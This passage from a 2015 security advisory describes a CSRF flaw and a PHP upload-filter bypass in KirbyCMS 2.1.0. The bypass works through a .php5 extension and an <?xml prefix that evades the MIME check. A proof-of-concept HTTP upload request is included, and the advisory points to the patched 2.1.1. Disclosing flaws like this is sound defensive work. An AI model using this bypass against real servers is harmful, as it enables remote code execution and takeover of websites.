This issue can allow an unauthorised attacker to modify or upload new content.

Both of the issues can be combined to execute arbitrary PHP code on the
remote server hosting KirbyCMS, if a logged-in victim visits a malicious page 
containing an exploit crafted by an attacker.


IV. PHP Code Execution
-------------------------
 
KirbyCMS allows both admin users and low-privileged editor users who can
access the control panel to upload content.
The upload feature accepts images and other media files, which can be
referenced within the content once uploaded.

KirbyCMS performs the following validation before saving an uploaded file
to prohibit risky uploads:

---[ panel/app/controllers/api/files.php ]---

  protected function checkUpload($file, $blueprint) {

    if(strtolower($file->extension()) == kirby()->option('content.file.extension', 'txt')) {
      throw new Exception('Content files cannot be uploaded');
    } else if(strtolower($file->extension()) == 'php' or
              in_array($file->mime(), f::$mimes['php'])) {
      throw new Exception('PHP files cannot be uploaded');
    } else if(strtolower($file->extension()) == 'html' or
              $file->mime() == 'text/html') {
      throw new Exception('HTML files cannot be uploaded');

    ...

   }

---------------------------------------------

As we can see, it prevents uploading PHP files by checking whether an uploaded
file has a '.php' extension, or whether the discovered MIME type of the file
has been evaluated to PHP. KirbyCMS throws an exception and stops further
processing if either of the conditions is true.

Unfortunately, both of the checks can easily be bypassed on multiple server
configurations.

Many server configurations, such as Ubuntu or Debian, process several file
extensions as PHP scripts, e.g. .php, .php4 and .php5.
The extension check can therefore be evaded by simply uploading a malicious
file with the '.php4' extension.
The MIME type check can also be easily bypassed by preceding the <?php script
tags with <?xml tags, to trick the MIME detector into recognising the
malicious file as XML and thus passing the check (mime['php'] != mime['xml']).

As the upload directory is not set to disable script execution by default,
bypassing the checks allows arbitrary PHP scripts to be uploaded and executed
on the remote server hosting a vulnerable KirbyCMS installation.


V. CSRF
-------------------------

Media files are only meant to be uploaded by authenticated users such
as editors or site administrators. 
However, KirbyCMS's upload function does not protect against 
cross-site request forgery by including a special CSRF token to verify
the source of the request.

As a result, an attacker can prepare a specially-crafted webpage which uploads
a malicious file to the remote KirbyCMS site without the user's knowledge,
if the attacker manages to trick the logged-in victim into visiting that page.

 
VI. PROOF OF CONCEPT
-------------------------

Both of the issues described above can be combined to prepare a malicious page
which uploads an arbitrary PHP file as soon as a victim authenticated
into KirbyCMS visits the page. 

A malicious CSRF HTML page could send a request similar to the following:

POST /kirby/panel/api/files/upload/about HTTP/1.1
Host: victim_kirby_server
Content-Type: multipart/form-data; boundary=---------------------------4679830631250006491995140822
Content-Length: 261
Origin: null
Cookie: PHPSESSID=tjnqqia89ka0q7khl4v72r6nl1; kirby=323b04a2a3e7f00...

-----------------------------4679830631250006491995140822
Content-Disposition: form-data; name="file"; filename="kirbyexec.php5"
Content-Type: application/x-php

<?xml >
<?php

phpinfo();

?>


-----------------------------4679830631250006491995140822--


As a result the file is uploaded into the kirby/content/1-about directory
on the server.

The malicious file can then be accessed via the URL:

http://victim_kirby_server/kirby/content/1-about/kirbyexec.php5

Once opened, phpinfo() page should be loaded.


VII. BUSINESS IMPACT
-------------------------

By combining the two issues an attacker could execute arbitrary PHP code
on the remote server without any authentication to gain full control over
the website using a vulnerable KirbyCMS.

 
VIII. SYSTEMS AFFECTED
-------------------------

The latest version of KirbyCMS (2.1.0) was confirmed to be exploitable.

To exploit the PHP script execution vulnerability the webserver must be 
configured to process files as PHP with extensions other than .php. 
Ubuntu and Debian systems fulfill this condition. There might be more systems
which are configured in this way by default, or have been reconfigured to
do so.

To gain access to the control panel and upload a malicious PHP file, an 
attacker may be able to exploit a separate, Authentication Bypass issue also
discovered by Dawid Golunski, described in a separate document.

 
IX. SOLUTION
-------------------------

Upgrade to the patched version 2.1.1 released by the vendor in response to this advisory.
 
X. REFERENCES
-------------------------

http://legalhackers.com

http://legalhackers.com/advisories/KirbyCMS-CSRF-PHP-File-Upload-Vulnerability.txt

http://getkirby.com/

http://seclists.org/fulldisclosure/2015/Sep/index.html
http://www.securiteam.com/


XI. CREDITS
-------------------------

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
 
XII. REVISION HISTORY
-------------------------

14.09.2015 - Final
 
XIII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.